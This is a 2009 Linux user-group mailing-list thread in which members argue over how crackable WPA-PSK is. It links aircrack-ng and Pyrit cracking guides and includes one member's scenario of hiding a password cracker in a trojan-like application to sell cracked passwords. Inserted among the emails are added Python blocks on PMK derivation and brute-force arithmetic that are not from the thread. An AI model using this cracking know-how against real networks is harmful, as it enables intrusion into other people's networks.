Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Steven A. DuChene
dslinux.org

Wiki:  dslinux.org/wiki
Forums: dslinux.org/f0rums   (yes, the word forums but spelled
   with a zero in place of the "o")

-Original Message-
>From: Stephen 
>Sent: Nov 15, 2009 6:54 PM
>To: "Steven A. DuChene" , Main PLUG discussion 
>list 
>Subject: Re: running Linux on odd devices is SOOO COOL!
>
>link link link!
>
>On Fri, Nov 13, 2009 at 10:34 PM, Steven A. DuChene
> wrote:
>> So I am running a special version of Linux on my son's Nintendo DS Lite 
>> handheld game console!
>>
>> It is so cool!
>>
>
>
>
>-- 
>A mouse trap, placed on top of your alarm clock, will prevent you from
>rolling over and going back to sleep after you hit the snooze button.
>
>Stephen



---
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss


Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Stephen
link link link!

On Fri, Nov 13, 2009 at 10:34 PM, Steven A. DuChene
 wrote:
> So I am running a special version of Linux on my son's Nintendo DS Lite 
> handheld game console!
>
> It is so cool!
>



-- 
A mouse trap, placed on top of your alarm clock, will prevent you from
rolling over and going back to sleep after you hit the snooze button.

Stephen


Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Kurt Granroth
On 11/15/09 12:53 PM, Lisa Kachold wrote:
> I guess I still disagree with your use of the word 'broken'.  By that
> definition, gpg is 'broken' as well as *any* encryption system that uses
> passwords.  Just because you can brute force a crack doesn't
> mean that the protocol is broken.
>
> And as far as 'eventually' goes... according to the people at
> ElectricalAlchemy, a 12 character random password would take 28 TRILLION
> hours of computing power (defined as 'high-CPU on Amazon EC2').  Let's
> say that you can wrangle up 10,000 systems to work on this
> simultaneously.  It would still take over 300,000 YEARS to brute
> force it.
>
>
> Actually no; it would with current CUDA NVidia and faster processor
> techniques take at most 60 days.
>
> http://pyrit.wordpress.com/the-twilight-of-wi-fi-protected-access/
>
> Let's imagine I drive over to a well known corporation with WiFi (or
> target you and your networks); I can obtain sufficient information in
> less than 5 minutes; take it home and start the work.  Once I get the
> Pairwise Master Key - additional auth (captured in the stream) is trivial.

Thanks for the links to Pyrit; I hadn't heard of that project before. 
Very interesting stuff!

So in addition to using GPUs and multi-core systems, they also 
apparently are creating something like rainbow tables for common network 
names.  Clever.

BUT.. I'm still not seeing where you are getting the 'at most 60 days' 
figure.  The only figures that blog entry talks about refer to 8 
char passwords with common network names.

That's not at all what I'm dealing with, here.  Since the Pairwise 
Master Key is constructed of the network name PLUS the password, in 
reality, the true password that needs brute-forcing is the combination 
of both if the network name isn't common.  In my case, I have my 20-odd 
char password plus nearly 15 char (very non-common) network name. 
That's equivalent to a 35 char randomized full-ASCII set password!  I 
have serious doubts that such a password could be brute forced in 60 
days, even with a cloud of GPUs.

If I'm wrong, please tell me specifically where I'm wrong.  I truly want 
to know.  But everything I've read, so far, all seems to indicate that I 
am, in fact, as safe as I thought I was.

> I feel pretty safe with a protocol that would require longer than the age
> of the universe to crack!  I would NOT consider that broken :-)
>
>
> Well, evidently you are stuck in the security matrix; feels all good and
> safe in that denial?  I would challenge you to a real live test with
> your current configuration, but that work is (or was) really in your
> realm to complete right after installation; and I only pentest/crack
> with a fully signed contract or for demonstrations at PLUG HackFests for
> ITT and DeVry students at the John C. Lincoln Cowden Center.
>
> Happy wireless network sharing with smart kiddies running Backtrack4 USB
> on their NVidia gamer machines, Kurt!

If it's denial, then please let me know what I'm denying!  I've read 
everything you've provided and NOTHING in all of that is giving me any 
reason to think that my setup is any less secure than I thought at the 
outset of this discussion.

Also, FWIW, I'm not a sys-admin so this network is just my home wireless 
LAN.

> Radius is actually very trivial to run on Linux, and if you want to be
> really secure, it's especially easy to implement via SSO with sLDAP to a
> shared integration of Active Directory (where the Microsoft desktop
> staff maintain the users).

Yep.  That's what we use at work.  It would be irresponsible for any 
company to NOT use Radius given its advantages.


Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Kurt Granroth
On 11/15/09 10:56 AM, Alex Dean wrote:
> Kurt : Is that "28 trillion hours" figure you cited the estimated time
> to try *all* 12 character passwords? If so, I think that's not the right
> metric. The search for a password stops once you've found the correct
> one, and you'd only try them all if the correct password is the very
> last one you tried. It'd be helpful to know something like "I'm able to
> attempt 95% of all 12 character passwords after 28 trillion hours". If
> the password is truly a random string of junk, it's perfectly possible
> (just phenomenally unlikely) that you'll guess it on the 1st try.

Any figures cited regarding brute force attacks are necessarily the 
worst case scenario.  That is, if you had to go through the entire 
solution set, how long would it take?

Obviously, any real attack would take some amount of time less than 
that.  You could even guess it completely by accident on the first try 
making the "28 trillion hours" estimate come out to "less than one 
second" for that password.

The reason that the upper figure is always quoted, though, is that it is 
the only one that matters if you are going to try to brute force a 
password.  Since it *can* take that long, you must assume that it *will* 
take that long or else you are being foolishly optimistic.  The odds are 
solidly in favor of it taking very close to that amount of time.


Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Technomage
Robert Holtzman wrote:
>
> I was just about to comment on this. You beat me to it. In all the
> different material I've read, everyone is fond of saying it would
> take  of years to break a strong password. 
> Statistically the odds of the first try being successful are not, as you
> pointed out, zero and increase with each combination. Granted, it would
> still take a hell of a long time but not the  years
> people always claim.   
>   
You are not the only ones to notice this.
Perhaps a better metric would be the odds of determining the actual
password in a "reasonably short period" of time (say under 3 months).
Now, I don't have the math behind me to even approach this problem.
However, wouldn't similar large math problems (such as calculating the
odds of a specific set of balls dropping for the Powerball lotto that
week) give you a better metric of how to calculate probability of
success?




Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Jason Spatafore
On Sun, 2009-11-15 at 13:22 -0700, Robert Holtzman wrote:
> I was just about to comment on this. You beat me to it. In all the
> different material I've read, everyone is fond of saying it would
> take  of years to break a strong password. 
> Statistically the odds of the first try being successful are not, as
> you
> pointed out, zero and increase with each combination. Granted, it
> would
> still take a hell of a long time but not the 
> years
> people always claim.   

On top of that, people don't take into account how exponential
inventions reduce that time dramatically.

Okay, let's say it takes 300,000 years to crack a password. That's 1
system...running for 300,000 years.

Now, use the Seti project with distributed computing and hide it inside
of a "useful" application. Do you really think it will take long to get
1 million downloads?

So, 1 million downloads...your distributed password cracking application
is now deployed and people allowed it to connect and bypass all
firewalls because, well, it was trusted.

So, 1 million systems doing a 300,000 year task. What does that equate
to? Now think of what would happen if you got 2 million, 4 million, and
8 million computers?

In short time, you can crack that password in 1 hour. NOW, what if you
made a business out of cracking passwords for the bad guys? 24 passwords
per day...selling at $3,000 a password...think about how good of a life
you can have making $26,280,000 / year for writing a piece of software?
Do you really think it will be hard to pay off a couple network
administrators to mask your IP? Say you pay them 50k each and you need
20 of them...that's only $2mil you give up a year. You're still netting
$24 mil. You do it for one year, you never work again.

Just think of the scenario...and remember, humans are the weakest link
in the whole chain.

Oh, and the scary part...reduce that price per password to $300.00..you
make less money, but you just increased your client base immensely.

It's a scary thought. BUT, ultimately, all this does is make people
think "Then what good is it to fight? I'll just leave admin/admin as my
router password. No use in trying to beat it."




Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Steven A. DuChene

OK, I am going to forcibly pull this back on topic!  :-)

If anyone is interested in seeing this Nintendo DS running
Linux and wants to know how to do it, I can bring it to one
of the east side PLUG meetings and do a 5 - 10 minute talk
on the process.
--
Steven DuChene




Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Robert Holtzman
On Sun, Nov 15, 2009 at 11:56:18AM -0600, Alex Dean wrote:

 snip.

>
> Kurt : Is that "28 trillion hours" figure you cited the estimated time  
> to try *all* 12 character passwords?  If so, I think that's not the  
> right metric.  The search for a password stops once you've found the  
> correct one, and you'd only try them all if the correct password is the 
> very last one you tried.  It'd be helpful to know something like "I'm 
> able to attempt 95% of all 12 character passwords after 28 trillion 
> hours".  If the password is truly a random string of junk, it's perfectly 
> possible (just phenomenally unlikely) that you'll guess it on the 1st 
> try.

I was just about to comment on this. You beat me to it. In all the
different material I've read, everyone is fond of saying it would
take  of years to break a strong password. 
Statistically the odds of the first try being successful are not, as you
pointed out, zero and increase with each combination. Granted, it would
still take a hell of a long time but not the  years
people always claim.   

-- 
Bob Holtzman
Key ID: 8D549279
"If you think you're getting free lunch,
 check the price of the beer"



Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Lisa Kachold
On Sun, Nov 15, 2009 at 9:40 AM, Kurt Granroth <
kurt+plug-disc...@granroth.com > wrote:

> On 11/15/09 5:57 AM, Lisa Kachold wrote:
> > On Saturday, November 14, 2009, Kurt Granroth
> > >
>  wrote:
> >> Lisa,
> >>
> >> I'll grant you the denial-of-service attack, but I'm still not finding
> >> any evidence that WPA is fundamentally flawed (much less "easier to
> >> crack... than WEP").
> > You simply capture the auth with aircrack-ng.
> > Even 20 characters can be decrypted eventually!  A dictionary attack
> > is faster and a truly random password delays the process and none of
> > this is any reason to not use security tools but the fact is the
> > protocol has been broken! I know I put in a Nomadix and Cisco Aironet
> > with Active Directory and RADIUS in 2003.
> > RADIUS is a nice solution; we used them for our dialup with Livingstons
> > at Nike and various ISPs.
>
> I guess I still disagree with your use of the word 'broken'.  By that
> definition, gpg is 'broken' as well as *any* encryption system that uses
> passwords.  Just because you can brute force a crack doesn't
> mean that the protocol is broken.
>
> And as far as 'eventually' goes... according to the people at
> ElectricalAlchemy, a 12 character random password would take 28 TRILLION
> hours of computing power (defined as 'high-CPU on Amazon EC2').  Let's
> say that you can wrangle up 10,000 systems to work on this
> simultaneously.  It would still take over 300,000 YEARS to brute force it.
>

Actually no; it would with current CUDA NVidia and faster processor
techniques take at most 60 days.

http://pyrit.wordpress.com/the-twilight-of-wi-fi-protected-access/

Let's imagine I drive over to a well known corporation with WiFi (or target
you and your networks); I can obtain sufficient information in less than 5
minutes; take it home and start the work.  Once I get the Pairwise Master
Key - additional auth (captured in the stream) is trivial.

Now tell me truly that your WiFi configurations are:

- 20 character pass
- truly random with upper case letters and numbers
- fully tested against current crack techniques
- changed every 60 days

and optimally:

- on their own isolated VLAN

Pyrit is a Google Code CUDA NVidia cracking utility.  Pyrit takes a step
ahead in attacking WPA-PSK and WPA2-PSK, the protocols that protect today's
public WiFi airspace.  Pyrit's implementation allows creating massive
databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a
space-time trade-off. The performance gain for real-world attacks is in the
range of three orders of magnitude, which urges reconsideration of the
protocol's security. Exploiting the computational power of many-core and
other platforms through ATI Stream, Nvidia CUDA, OpenCL and VIA Padlock, it
is currently by far the most powerful attack against one of the world's most
used security protocols. For more background see this article on the
project's blog: http://code.google.com/p/pyrit/

>
> Looking at the curve, I would guess that a 20 character password would
> take well into the trillions of years (or likely more) to brute force.
> That's much older than the age of the universe!
>
> I feel pretty safe with a protocol that would require longer than the age
> of the universe to crack!  I would NOT consider that broken :-)
>

Well, evidently you are stuck in the security matrix; feels all good and
safe in that denial?  I would challenge you to a real live test with your
current configuration, but that work is (or was) really in your realm to
complete right after installation; and I only pentest/crack with a fully
signed contract or for demonstrations at PLUG HackFests for ITT and DeVry
students at the John C. Lincoln Cowden Center.

Happy wireless network sharing with smart kiddies running Backtrack4 USB on
their NVidia gamer machines, Kurt!

See my other post regarding current Cisco LEAP for Microsoft A/D or Radius,
and sLDAP/Radius WPA "secure" auth implementations of Wireless networking.

Radius is actually very trivial to run on Linux, and if you want to be
really secure, it's especially easy to implement via SSO with sLDAP to a
shared integration of Active Directory (where the Microsoft desktop staff
maintain the users).

-- 
Skype: (623)239-3392
AT&T: (503)754-4452
www.it-clowns.com
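The point in Kurt's reply above (that the Pairwise Master Key is built from the network name plus the passphrase) and in the Pyrit description (pre-computing part of the PSK authentication phase per network name) both come down to how the PMK is derived. The block below is an added example, not code from the thread or from the Pyrit or aircrack-ng projects: it derives the PMK the way IEEE 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as salt), checks the result against the standard's published test vector, and adds a small configuration review whose SSID and passphrase lists are constructed here purely for illustration.

```python
import hashlib

# Added example; not code from the thread or from the pyrit/aircrack-ng projects.
# WPA/WPA2-PSK derives the 256-bit Pairwise Master Key (PMK) from the passphrase
# and the SSID with PBKDF2-HMAC-SHA1 at 4096 iterations (IEEE 802.11i). The SSID
# is the salt: it is broadcast in the clear, so it adds no secret material, but it
# binds the derived key to one network name.
PBKDF2_ITERATIONS = 4096
PMK_LENGTH_BYTES = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 32-byte PMK for a WPA/WPA2-PSK passphrase and SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        dklen=PMK_LENGTH_BYTES,
    )


# Published test vector from IEEE 802.11i Annex H; `wpa_passphrase IEEE password`
# prints the same psk= line.
STANDARD_VECTOR = (
    "password",
    "IEEE",
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
)


def matches_standard_vector() -> bool:
    """True when derive_pmk reproduces the standard's test vector."""
    passphrase, ssid, expected_hex = STANDARD_VECTOR
    return derive_pmk(passphrase, ssid).hex() == expected_hex


def pmk_bound_to_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when one passphrase yields different PMKs on two network names.

    This is why a PMK table pre-computed for one SSID cannot be reused against
    a network with a different SSID: the salt changes the whole derivation."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


# Constructed lists for the review below (illustration only); a real check would
# use a maintained default-SSID list and a real weak-password blacklist.
COMMON_DEFAULT_SSIDS = {"linksys", "default", "NETGEAR", "dlink", "Belkin54g"}
WEAK_PASSPHRASES = {"password", "12345678", "admin1234", "passphrase"}


def review_psk_config(passphrase: str, ssid: str, min_length: int = 20) -> list:
    """Return findings for a PSK network configuration (empty list = none).

    Encodes the checklist argued over in the thread: a long passphrase that is
    not a dictionary word, on a network name that pre-computed tables will not
    already cover."""
    findings = []
    if len(passphrase) < min_length:
        findings.append(f"passphrase shorter than {min_length} characters")
    if passphrase.lower() in WEAK_PASSPHRASES:
        findings.append("passphrase is a well-known weak value")
    if ssid in COMMON_DEFAULT_SSIDS:
        findings.append("SSID is a common default; pre-computed PMK tables exist for it")
    return findings


if __name__ == "__main__":
    # Constructed sample configurations, not anyone's real network.
    print("standard vector ok:", matches_standard_vector())
    print("same passphrase, SSIDs 'IEEE' vs 'ieee' differ:",
          pmk_bound_to_ssid("password", "IEEE", "ieee"))
    for passphrase, ssid in [("password", "linksys"),
                             ("correct-horse-battery-staple-42", "example-home-net")]:
        print(ssid, "->", review_psk_config(passphrase, ssid) or "no findings")
```

Because the SSID is the PBKDF2 salt, a pre-computed table of PMKs only pays off against networks that share the very same name, which is why such tables are built for common default SSIDs and why a distinctive SSID is worth having on a PSK network; the SSID is still public, so the secret material remains the passphrase alone.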

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Alex Dean


On Nov 15, 2009, at 10:40 AM, Kurt Granroth wrote:

> I feel pretty safe with a protocol that would require longer than the
> age of the universe to crack!  I would NOT consider that broken :-)

I think this is a pretty sane approach to things.  You have to think  
about likely vs. unlikely, not possible vs. impossible.


The fact that any password can be guessed eventually isn't the point.   
You just have to make it inconvenient enough for an attacker that they  
give up and go somewhere else.  Obviously that calculus is different  
when the payoff for your cracking efforts is 'taking down a power  
grid' or 'launching a missile', instead of 'free wireless access'.  To  
me, if it's likely to take a cracker multiple years of concerted effort  
to break my wireless network, that's plenty for me.


Kurt : Is that "28 trillion hours" figure you cited the estimated time  
to try *all* 12 character passwords?  If so, I think that's not the  
right metric.  The search for a password stops once you've found the  
correct one, and you'd only try them all if the correct password is  
the very last one you tried.  It'd be helpful to know something like  
"I'm able to attempt 95% of all 12 character passwords after 28  
trillion hours".  If the password is truly a random string of junk,  
it's perfectly possible (just phenomenally unlikely) that you'll guess  
it on the 1st try.


Thanks for an interesting discussion.

alex


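The arithmetic behind Kurt's worst-case figures, Alex's "95% of all 12 character passwords" metric above, and Technomage's "odds within three months" question is the same small calculation over the size of the keyspace. The block below is an added example, not code from the thread; the guess rates and time budgets in it are constructed assumptions, and the only numbers taken from the thread are the 28 trillion hours and 10,000 machines, which it re-derives to show what guess rate that figure implies.

```python
# Added example; not code from the thread. Every rate and budget below is a
# constructed assumption chosen to make the arithmetic concrete.
SECONDS_PER_HOUR = 3600
HOURS_PER_YEAR = 365.25 * 24
PRINTABLE_ASCII = 95  # printable US-ASCII characters, space included


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidate passwords of exactly this length."""
    return alphabet_size ** length


def worst_case_seconds(space: int, guesses_per_second: float) -> float:
    """Time to exhaust the whole keyspace: the figure usually quoted."""
    return space / guesses_per_second


def expected_seconds(space: int, guesses_per_second: float) -> float:
    """Mean time to hit a uniformly random password: half the worst case."""
    return worst_case_seconds(space, guesses_per_second) / 2


def success_probability(space: int, guesses_per_second: float,
                        budget_seconds: float) -> float:
    """Chance of finding a uniformly random password within a time budget.

    Each guess eliminates one candidate, so the probability is the fraction
    of the keyspace the budget covers, capped at 1."""
    return min(1.0, guesses_per_second * budget_seconds / space)


def seconds_for_coverage(space: int, guesses_per_second: float,
                         fraction: float) -> float:
    """Time to reach a given success probability (the "95%" metric)."""
    return fraction * worst_case_seconds(space, guesses_per_second)


def implied_guess_rate(space: int, worst_case_hours: float) -> float:
    """Guess rate, in guesses per second, that a quoted worst-case assumes."""
    return space / (worst_case_hours * SECONDS_PER_HOUR)


def years_with_parallelism(worst_case_hours: float, systems: int) -> float:
    """Worst-case time in years when the work is split across N machines."""
    return worst_case_hours / systems / HOURS_PER_YEAR


def minimum_length_for_budget(alphabet_size: int, guesses_per_second: float,
                              budget_seconds: float, max_probability: float) -> int:
    """Shortest random password for which an attacker with this rate and time
    budget has at most max_probability of success.

    This is the defender's form of the question: derive the password length
    from the threat model instead of arguing about a single quoted figure."""
    length = 1
    while success_probability(keyspace(alphabet_size, length),
                              guesses_per_second, budget_seconds) > max_probability:
        length += 1
    return length


if __name__ == "__main__":
    space = keyspace(PRINTABLE_ASCII, 12)
    # The thread's 28 trillion hours for 12 printable-ASCII characters.
    print(f"implied rate: {implied_guess_rate(space, 28e12):.3g} guesses/s")
    print(f"10,000 machines: {years_with_parallelism(28e12, 10_000):,.0f} years worst case")
    rate = 1e9  # assumed: one billion guesses per second across a GPU farm
    ninety_days = 90 * 24 * SECONDS_PER_HOUR
    print(f"P(success in 90 days at 1e9/s): {success_probability(space, rate, ninety_days):.2e}")
    print(f"95% coverage at 1e9/s: {seconds_for_coverage(space, rate, 0.95) / SECONDS_PER_HOUR / HOURS_PER_YEAR:.3g} years")
    print("length for P<=1e-6 over one year at 1e9/s:",
          minimum_length_for_budget(PRINTABLE_ASCII, rate, HOURS_PER_YEAR * SECONDS_PER_HOUR, 1e-6))
```

The 28 trillion hour figure works out to roughly five million guesses per second for a single machine, so the probability of finding a 12-character random password within three months scales linearly with however many times faster the attacker's hardware is than that, and the worst-case and 95% figures differ only by the factor 0.95.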

Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Kurt Granroth
On 11/15/09 5:57 AM, Lisa Kachold wrote:
> On Saturday, November 14, 2009, Kurt Granroth
>   wrote:
>> Lisa,
>>
>> I'll grant you the denial-of-service attack, but I'm still not finding
>> any evidence that WPA is fundamentally flawed (much less "easier to
>> crack... than WEP").
> You simply capture the auth with aircrack-ng.
> Even 20 characters can be decrypted eventually!  A dictionary attack
> is faster and a truly random password delays the process and none of
> this is any reason to not use security tools but the fact is the
> protocol has been broken! I know I put in a Nomadix and Cisco Aironet
> with Active Directory and RADIUS in 2003.
> RADIUS is a nice solution; we used them for our dialup with Livingstons
> at Nike and various ISPs.

I guess I still disagree with your use of the word 'broken'.  By that 
definition, gpg is 'broken' as well as *any* encryption system that uses 
passwords.  Just because you can brute force a crack doesn't 
mean that the protocol is broken.

And as far as 'eventually' goes... according to the people at 
ElectricalAlchemy, a 12 character random password would take 28 TRILLION 
hours of computing power (defined as 'high-CPU on Amazon EC2').  Let's 
say that you can wrangle up 10,000 systems to work on this 
simultaneously.  It would still take over 300,000 YEARS to brute force it.

Looking at the curve, I would guess that a 20 character password would 
take well into the trillions of years (or likely more) to brute force. 
That's much older than the age of the universe!

I feel pretty safe with a protocol that would require longer than the age 
of the universe to crack!  I would NOT consider that broken :-)


Re: running Linux on odd devices is SOOO COOL!

2009-11-15 Thread Lisa Kachold
On Saturday, November 14, 2009, Kurt Granroth
 wrote:
> Lisa,
>
> I'll grant you the denial-of-service attack, but I'm still not finding
> any evidence that WPA is fundamentally flawed (much less "easier to
> crack... than WEP").
You simply capture the auth with aircrack-ng.
Even 20 characters can be decrypted eventually!  A dictionary attack
is faster and a truly random password delays the process and none of
this is any reason to not use security tools but the fact is the
protocol has been broken! I know I put in a Nomadix and Cisco Aironet
with Active Directory and RADIUS in 2003.
RADIUS is a nice solution; we used them for our dialup with Livingstons
at Nike and various ISPs.
> I read the aircrack article earlier to see if there was new info that I
> had missed.  I also read the article you have on obnosis.com.  Finally,
> I read the LucidInteractive article you just provided.
>
> ALL of them say the same thing: the only valid attack on WPA-PSK is a
> dictionary or brute force attack!
>
> Okay, yes, it's very handy that you can do the password cracking
> offline.  But see the links I listed earlier... any decently crafted
> password will be nigh IMPOSSIBLE to crack unless you have nearly
> infinite resources -- offline or no.
>
> I realize that you likely (for sure) know more about this than I do so
> if I keep missing some fundamental flaw in PSK in all of the articles
> provided, please enlighten me!
>
> Kurt
>
> On 11/14/09 5:59 PM, Lisa Kachold wrote:
>> Kurt,
>>
>> As you stated, WPA/WPA2-PSK security is inherently flawed:
>>
>>     * One flaw allowed an attacker to cause a denial-of-service attack,
>>       if the attacker could bypass several other layers of protection.
>>     * A second flaw exists in the method with which WPA initializes its
>>       encryption scheme. Consequently, it's actually easier to crack WPA
>>       than it is to crack WEP. This flaw is the subject of this article.
>>
>>
>> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
>> is also a little more cracker friendly. By capturing the right type of
>> packets, you can do your cracking offline. This means you only have to
>> be near the AP for a matter of seconds to get what you need. WPA
>> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
>> is not so much.
>>
>> /_*But how many people actually have WPA RADIUS encryption?*_/
>>
>> Here's another link that includes PSK cracking Howto:
>> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>>
>> Using aircrack-ng tools in Backtrack (per my presentation materials at
>> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>>
>> Does anyone here run Radius?
>>
>> Here's an accompanying document to better explain it:
>> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>>
>>
>> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
>> > > wrote:
>>
>>     On 11/14/09 12:02 PM, Lisa Kachold wrote:
>>      > The whole concept of "wireless encryption security" is somewhat moot
>>      > with airodump-ng etc tools.
>>      >
>>      > WEP keys are really easy to break.
>>      >
>>      > WPA is also easily encroached - but harder with a truly unique
>>     secure
>>      > key (which few people use)
>>      >
>>      > It just exists as part of the big "security" matrix to keep the
>>     honest
>>      > people out.  Crackers can get right in anyway!
>>      >
>>      > http://www.obnosis.com/Layer8Wireless.html
>>
>>     Okay, I have to take exception to how this is written.  You are
>>     comparing the security of WEP and WPA as if they are somehow equivalent
>>     or equally "easy" to crack.  That is just not true.
>>
>>     WEP is fundamentally broken.  It can be reliably cracked in seconds, in
>>     most cases.  Its use is more of a "please don't use this network" flag
>>     than any real attempt to keep people out.
>>
>>     WPA, on the other hand, is NOT broken.  Only one variation of it is
>>     crackable at all (PSK) and even then, the attack is a brute force
>>     dictionary attack.  By that argument, ALL password based encryption is
>>     crackable.
>>
>>     Yes, you could successfully argue that since MOST home APs use PSK and
>>     MOST probably just set the password to 'admin' or 'linksys' or some
>>     other trivial name, that IN PRACTICE, it's not hard to crack most uses
>>     of WPA.
>>
>>     But saying that "[c]rackers can get right in anyway" just isn't true.
>>     All that is needed is a reasonably difficult password.  Don't use a
>>     dictionary word and make it decently long and it quickly becomes far too
>>     difficult to crack to make it worth it for all but the most extreme
>>     cases.  It's either VERY expensive or takes YEARS.
>>
>>     I'm sure that you read this:
>>
>>     
>> http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>>
>>     It answers the question: "how much does 

Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread Kurt Granroth
Lisa,

I'll grant you the denial-of-service attack, but I'm still not finding 
any evidence that WPA is fundamentally flawed (much less "easier to 
crack... than WEP").

I read the aircrack article earlier to see if there was new info that I 
had missed.  I also read the article you have on obnosis.com.  Finally, 
I read the LucidInteractive article you just provided.

ALL of them say the same thing: the only valid attack on WPA-PSK is a 
dictionary or brute force attack!

Okay, yes, it's very handy that you can do the password cracking 
offline.  But see the links I listed earlier... any decently crafted 
password will be nigh IMPOSSIBLE to crack unless you have nearly 
infinite resources -- offline or no.

I realize that you likely (for sure) know more about this than I do so 
if I keep missing some fundamental flaw in PSK in all of the articles 
provided, please enlighten me!

Kurt

On 11/14/09 5:59 PM, Lisa Kachold wrote:
> Kurt,
>
> As you stated, WPA/WPA2-PSK security is inherently flawed:
>
> * One flaw allowed an attacker to cause a denial-of-service attack,
>   if the attacker could bypass several other layers of protection.
> * A second flaw exists in the method with which WPA initializes its
>   encryption scheme. Consequently, it's actually easier to crack WPA
>   than it is to crack WEP. This flaw is the subject of this article.
>
>
> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
> is also a little more cracker friendly. By capturing the right type of
> packets, you can do your cracking offline. This means you only have to
> be near the AP for a matter of seconds to get what you need. WPA
> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
> is not so much.
>
> /_*But how many people actually have WPA RADIUS encryption?*_/
>
> Here's another link that includes PSK cracking Howto:
> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>
> Using aircrack-ng tools in Backtrack (per my presentation materials at
> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>
> Does anyone here run Radius?
>
> Here's an accompanying document to better explain it:
> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>
>
> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
>  > wrote:
>
> On 11/14/09 12:02 PM, Lisa Kachold wrote:
>  > The whole concept of "wireless encryption security" is somewhat moot
>  > with airodump-ng etc tools.
>  >
>  > WEP keys are really easy to break.
>  >
>  > WPA is also easily encroached - but harder with a truly unique
> secure
>  > key (which few people use)
>  >
>  > It just exists as part of the big "security" matrix to keep the
> honest
>  > people out.  Crackers can get right in anyway!
>  >
>  > http://www.obnosis.com/Layer8Wireless.html
>
> Okay, I have to take exception to how this is written.  You are
> comparing the security of WEP and WPA as if they are somehow equivalent
> or equally "easy" to crack.  That is just not true.
>
> WEP is fundamentally broken.  It can be reliably cracked in seconds, in
> most cases.  Its use is more of a "please don't use this network" flag
> than any real attempt to keep people out.
>
> WPA, on the other hand, is NOT broken.  Only one variation of it is
> crackable at all (PSK) and even then, the attack is a brute force
> dictionary attack.  By that argument, ALL password based encryption is
> crackable.
>
> Yes, you could successfully argue that since MOST home APs use PSK and
> MOST probably just set the password to 'admin' or 'linksys' or some
> other trivial name, that IN PRACTICE, it's not hard to crack most uses
> of WPA.
>
> But saying that "[c]rackers can get right in anyway" just isn't true.
> All that is needed is a reasonably difficult password.  Don't use a
> dictionary word and make it decently long and it quickly becomes far too
> difficult to crack to make it worth it for all but the most extreme
> cases.  It's either VERY expensive or takes YEARS.
>
> I'm sure that you read this:
>
> 
> http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>
> It answers the question: "how much does it cost to crack a password?"
> It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve
> character password using the full ASCII set would cost over $8 TRILLION
> dollars to crack.  Even much smaller passwords are still in the
> millions.
>
> The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
> the ASCII range.  Far from allowing crackers to "get right in", it's
> nearly impossible for them to do so.

Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread Lisa Kachold
Kurt,

As you stated, WPA/WPA2-PSK security is inherently flawed:


   - One flaw allowed an attacker to cause a denial-of-service attack, if
   the attacker could bypass several other layers of protection.
   - A second flaw exists in the method with which WPA initializes its
   encryption scheme. Consequently, it's actually easier to crack WPA than it
   is to crack WEP. This flaw is the subject of this article.


A WPA key *can* be made good enough to make cracking it unfeasible. WPA is
also a little more cracker friendly. By capturing the right type of packets,
you can do your cracking offline. This means you only have to be near the AP
for a matter of seconds to get what you need. WPA basically comes in two
flavours RADIUS or PSK. PSK is crackable, RADIUS is not so much.

*But how many people actually have WPA RADIUS encryption?*

Here's another link that includes PSK cracking Howto:
http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Using aircrack-ng tools in BackTrack (as my presentation materials at
http://plug.phoenix.az.us show), WEP and WPA/WPA2-PSK are easy to crack.

Does anyone here run Radius?

Here's an accompanying document to better explain it:
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks


On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth <
kurt+plug-disc...@granroth.com > wrote:

> On 11/14/09 12:02 PM, Lisa Kachold wrote:
> > The whole concept of "wireless encryption security" is somewhat moot
> > with airodump-ng etc tools.
> >
> > WEP keys are really easy to break.
> >
> > WPA is also easily encroached - but harder with a truly unique secure
> > key (which few people use)
> >
> > It just exists as part of the big "security" matrix to keep the honest
> > people out.  Crackers can get right in anyway!
